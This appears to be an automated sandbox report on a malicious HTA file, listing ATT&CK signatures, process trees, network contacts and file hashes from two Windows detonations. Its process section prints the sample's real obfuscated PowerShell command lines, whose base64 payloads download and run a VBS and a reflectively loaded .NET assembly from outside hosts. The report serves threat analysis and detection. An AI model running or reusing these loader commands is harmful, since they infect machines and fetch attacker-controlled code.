Malware Analysis Report

2024-12-07 17:05

Sample ID 241113-h931ms1jap
Target seemybestpartaroundtheworldtogetmethingsfornewone.hta
SHA256 0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7
Tags
defense_evasion discovery execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7

Threat Level: Likely malicious

The file seemybestpartaroundtheworldtogetmethingsfornewone.hta was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion discovery execution

Blocklisted process makes network request

Evasion via Device Credential Deployment

Command and Scripting Interpreter: PowerShell

Checks computer location settings

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 07:27

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 07:27

Reported

2024-11-13 07:29

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemybestpartaroundtheworldtogetmethingsfornewone.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4136 wrote to memory of 2016 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
PID 4136 wrote to memory of 2016 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
PID 4136 wrote to memory of 2016 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
PID 2016 wrote to memory of 2884 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2016 wrote to memory of 2884 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2016 wrote to memory of 2884 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2016 wrote to memory of 4228 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2016 wrote to memory of 4228 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2016 wrote to memory of 4228 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4228 wrote to memory of 1964 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4228 wrote to memory of 1964 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4228 wrote to memory of 1964 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2016 wrote to memory of 3376 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WScript.exe
PID 2016 wrote to memory of 3376 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WScript.exe
PID 2016 wrote to memory of 3376 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WScript.exe
PID 3376 wrote to memory of 1204 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3376 wrote to memory of 1204 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3376 wrote to memory of 1204 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1204 wrote to memory of 2600 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1204 wrote to memory of 2600 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1204 wrote to memory of 2600 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemybestpartaroundtheworldtogetmethingsfornewone.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE

"C:\Windows\SysTeM32\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE" "powersheLL.Exe -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe ; IEx($(IEX('[SySTem.tEXT.eNcodINg]'+[cHAR]58+[cHar]58+'UTf8.gEtSTrinG([SYSTEm.CONvErt]'+[ChAR]0X3A+[cHar]58+'FrOmbaSe64sTrINg('+[chaR]0X22+'JGQzV3JwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJFckRlRmluaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJrdExTUVhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVYb1FHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJIbGxGLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsb3hDeHF1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdXUik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkJaZ1NrT0N3ZnQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpXYW1SYUx2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRkM1dycDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTY3L3hhbXBwL25jL3NlZXRoZWJlc3RvcHRpb25zdG91bmRlcnN0YW5kZmFzdHRoaW5nc3RvYmVnZXRiYWNrYmlzY3V0LnRJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0b3B0aW9uc3RvdW5kZXJzdGFuZGZhc3R0aGluZ3N0b2JlZ2V0LnZiUyIsMCwwKTtTdEFSdC1TbEVlUCgzKTtzdGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdG9wdGlvbnN0b3VuZGVyc3RhbmRmYXN0dGhpbmdzdG9iZWdldC52YlMi'+[ChAr]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2fvan35g\2fvan35g.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC709.tmp" "c:\Users\Admin\AppData\Local\Temp\2fvan35g\CSCE0226E9C99154B06A1AF62835A6C94D.TMP"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHZlcmJPc0VwcmVmZVJlbmNlLnRvc3RySW5nKClbMSwzXSsnWCctam9JTicnKSgoJ2ZRSGltYWdlVXJsID0gb0xsaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT0yQWFfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblQnKydJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBvTGw7JysnZlFId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0RQPVKFCZHEXDABsonhadorldlYkNsaWUnKyduJysndDtmUUhpbWFnZUJ5JysndGVzID0gZlFId2ViQ2xpZW50LkRvd24nKydsb2FkRGF0YShmUUhpbWEnKydnZVVybCk7ZlFIaW1hJysnZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZlFIaW1hZ2VCeXRlcyk7ZlFIc3RhcnRGbGFnID0gb0xsPDxCQVNFNjRfU1RBUlQ+Pm9MbDtmUUhlbmRGbGFnID0gb0xsPDxCJysnQVMnKydFNjRfRU5EJysnPj5vTGw7ZlFIc3RhcnRJbmRleCA9JysnIGZRSGknKydtYWdlVGV4dC5JbmRleE9mKGZRSHN0YXJ0RmxhZyk7ZlFIZW5kSW5kJysnZXggPSAnKydmUUhpbWFnZVRleHQuSW5kZXhPZihmUUhlbmRGbGFnKTtmUUhzdGFydEluZGV4IC1nZSAwIC1hbmQgZlEnKydIZW5kSW5kZXggLWd0IGZRSHN0YXJ0SW5kZXg7ZlFIc3RhcnRJbmRleCArPSBmUUhzdGFydEZsYWcuTGVuZ3RoO2ZRSGInKydhc2U2NExlbmd0aCA9IGZRSGVuJysnZEluZGV4IC0gZlFIcycrJ3RhcnRJbmRleDtmJysnUUhiYXNlNjRDb21tYW5kID0gZlFIaW1hZ2VUZXh0LlN1YnN0cmluZyhmUUhzdGFydEluJysnZGV4LCBmUUhiYXNlNjRMZW5ndGgpO2ZRSGJhc2U2NFJldmVyc2VkID0gRQPVKFCZHEXDABsonhadorWpvaW4gKGZRSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAxaVEgRm9yRWFjaC1PYmplY3QgeyBmUUhfIH0pWy0xLi4tKGZRSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ZlFIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhmUScrJ0hiYXNlNjRSZXZlcnNlZCk7ZlFIbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGZRSGNvbW1hbmQnKydCeXRlcyk7ZlFIdmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChvTGxWQUlvTGwpO2ZRSHZhaU1ldGhvZC5JbnZva2UoZlFIbnVsbCwgQChvTGx0eHQuQVNGRVNSVy9jbi9wcG1heC83NjEuODcxLjY0Ljg5MS8vOnB0dGhvTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGFzcG5ldF9jb21waWxlcm9MbCwgb0xsZGVzYXRpdmFkb29MbCwgb0xsZGVzYXRpdmFkb29MbCxvTGxkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsb0xsZGVzYXRpdmFkb29MbCxvTGwnKydkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsJysnb0xsMW9MbCxvTGxkZXNhdGl2YWRvb0xsKSk7JykuckVwTGFjRSgoW2NoYXJdMTExK1tjaGFyXTc2K1tjaGFyXTEwOCksW3NUUklOZ11bY2hhcl0zOSkuckVwTGFjRSgoW2NoYXJdNDkrW2NoYXJdMTA1K1tjaGFyXTgxKSxbc1RSSU5nXVtjaGFyXTEyNCkuckVwTGFjRSgnZlFIJywnJCcpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 198.46.178.167:80 198.46.178.167 tcp
US 8.8.8.8:53 167.178.46.198.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp

Files

memory/2016-0-0x00000000718FE000-0x00000000718FF000-memory.dmp

memory/2016-1-0x0000000004690000-0x00000000046C6000-memory.dmp

memory/2016-2-0x00000000718F0000-0x00000000720A0000-memory.dmp

memory/2016-3-0x0000000004D00000-0x0000000005328000-memory.dmp

memory/2016-4-0x0000000004B50000-0x0000000004B72000-memory.dmp

memory/2016-5-0x0000000005520000-0x0000000005586000-memory.dmp

memory/2016-6-0x00000000055C0000-0x0000000005626000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h3djhirq.4dm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2016-14-0x0000000005630000-0x0000000005984000-memory.dmp

memory/2016-17-0x0000000005C20000-0x0000000005C3E000-memory.dmp

memory/2016-18-0x0000000005C50000-0x0000000005C9C000-memory.dmp

memory/2884-28-0x0000000006BF0000-0x0000000006C22000-memory.dmp

memory/2884-29-0x000000006E1B0000-0x000000006E1FC000-memory.dmp

memory/2884-39-0x0000000006C30000-0x0000000006C4E000-memory.dmp

memory/2884-40-0x0000000006C60000-0x0000000006D03000-memory.dmp

memory/2884-41-0x0000000007630000-0x0000000007CAA000-memory.dmp

memory/2884-42-0x0000000006F80000-0x0000000006F9A000-memory.dmp

memory/2884-43-0x0000000006FF0000-0x0000000006FFA000-memory.dmp

memory/2884-44-0x0000000007220000-0x00000000072B6000-memory.dmp

memory/2884-45-0x0000000007190000-0x00000000071A1000-memory.dmp

memory/2884-46-0x00000000071C0000-0x00000000071CE000-memory.dmp

memory/2884-47-0x00000000071D0000-0x00000000071E4000-memory.dmp

memory/2884-48-0x00000000072E0000-0x00000000072FA000-memory.dmp

memory/2884-49-0x0000000007210000-0x0000000007218000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\2fvan35g\2fvan35g.cmdline

MD5 c57c22f9b923ed2c68f65f7ed494c7ae
SHA1 2069249f453a36233d5779ec06741412303b27f8
SHA256 46f95cafdcdf74c3c7e08c9146278249699203ba32ef408e02458d20b19c9c7b
SHA512 36ec1be6f15d53965a4785dc1bcadcb4af442cf8945ec3d4abe0ed3694ef29ee5483fbe0536d4f5d4374dd46b0894db4a6c997ff138a791824b8a26972d7ca86

\??\c:\Users\Admin\AppData\Local\Temp\2fvan35g\2fvan35g.0.cs

MD5 0b9734ed54c4f41d0c94957b007eb3d5
SHA1 ebabbb2d826295a994ba691d921a4c7c5ed506d1
SHA256 36632527d6cce240e5833d6251632127fd95f085c35a3aa2a363be2f2cbc84fa
SHA512 d32ebc74674dd75c354a9b74324421a2a4af0a2d6feeb3735d3fab857fb488aaf8be88f4687299c614b6e70556b3980ba007ba02abb8e5e341a2cabccdd10b17

\??\c:\Users\Admin\AppData\Local\Temp\2fvan35g\CSCE0226E9C99154B06A1AF62835A6C94D.TMP

MD5 4c035a3958ba9ab11e62ce517aada424
SHA1 61df398d8667b92dce528b5f5ff89e7d54c5fcdb
SHA256 2b434a1b75df85040d865f8b8834830be68f276aff06d17bc0ad09f2eca568b8
SHA512 64620e5f6d8c9c79728935a8e936db2f41896d5ed64e19dc01e23011014a94556455e555c8cddaa577de1cd6a5aeee827476092995bc2c127a5487eb1f3c8f4b

C:\Users\Admin\AppData\Local\Temp\RESC709.tmp

MD5 e0b434577c6fa0e5e6222295a7f3041c
SHA1 fcdd1d10ccebc0369415036a85da1fd4883a0cbf
SHA256 15dd1d0c1b1f3c3842218be0af5c33109ee3d09db454908ad9f5df7ec9312929
SHA512 2324b2acd60af1c720c84af913ecfb61172198c46e0c5001e5f1d020d122f094b6f114441d58ef729aedf36000c0143ace70cebcb5bf1d684b3a5399ccc020a2

C:\Users\Admin\AppData\Local\Temp\2fvan35g\2fvan35g.dll

MD5 dd7eada18fc1658e9c6cb6ded3626e6d
SHA1 f4506f19f097ad27859633967f952c6cdd992378
SHA256 bac5dd11a1af83dc0d332c0931f680b6000c8ac7b5d702949a9f93b093b93539
SHA512 31f0358b6fb83bc86f8c8708a21c4f2e6f8ee7df7bf39858642b37307ec6e49c46785b2cb5e4ca3f69504f5e264cc2608b52de31566f9354b3f36ccca02dff0b

memory/2016-64-0x00000000061D0000-0x00000000061D8000-memory.dmp

memory/2016-70-0x00000000718FE000-0x00000000718FF000-memory.dmp

memory/2016-71-0x00000000718F0000-0x00000000720A0000-memory.dmp

memory/2016-72-0x0000000006FE0000-0x0000000007002000-memory.dmp

memory/2016-73-0x0000000007EC0000-0x0000000008464000-memory.dmp

C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS

MD5 4f46597a54e903c400cac4db5a222ecb
SHA1 0a2f30da05a532bfbddaba3af235011d60db8fc8
SHA256 ba78e6d4f42b1aab53a731c9bd0820d2f0278170eb5ef92604f32e92cfcb8246
SHA512 ffac65a2a99fe7c3883bb82f5736dbcbcdd8e3d8cecd265fda76e7b7d07d266f1f0b11eaa3adcf714a7e50314d3e140e50799e5b52fe2494da05f504912f344a

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOWeRSheLl.EXE.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2500ec1c663a1d19cee576bd18a2448d
SHA1 461f7aab0a0b95e91483c7364e6d18f8e88878eb
SHA256 6a58cf5eecfd56d1154dfd9763639731410709252ab83da240e7a0ca4a39c02e
SHA512 021a1b9d5b7c2249661f1626e03d02122602f33aa364d31114a5c6571e63beefeb2176569ab149650da8e572ba8e8e4498eec8035cafa8ff91f34d6f3c862710

memory/2016-80-0x00000000718F0000-0x00000000720A0000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 07:27

Reported

2024-11-13 07:29

Platform

win7-20241010-en

Max time kernel

14s

Max time network

18s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemybestpartaroundtheworldtogetmethingsfornewone.hta"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2536 wrote to memory of 2856 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
PID 2536 wrote to memory of 2856 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
PID 2536 wrote to memory of 2856 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
PID 2536 wrote to memory of 2856 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
PID 2856 wrote to memory of 2896 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2856 wrote to memory of 2896 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2856 wrote to memory of 2896 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2856 wrote to memory of 2896 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2856 wrote to memory of 2732 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2856 wrote to memory of 2732 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2856 wrote to memory of 2732 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
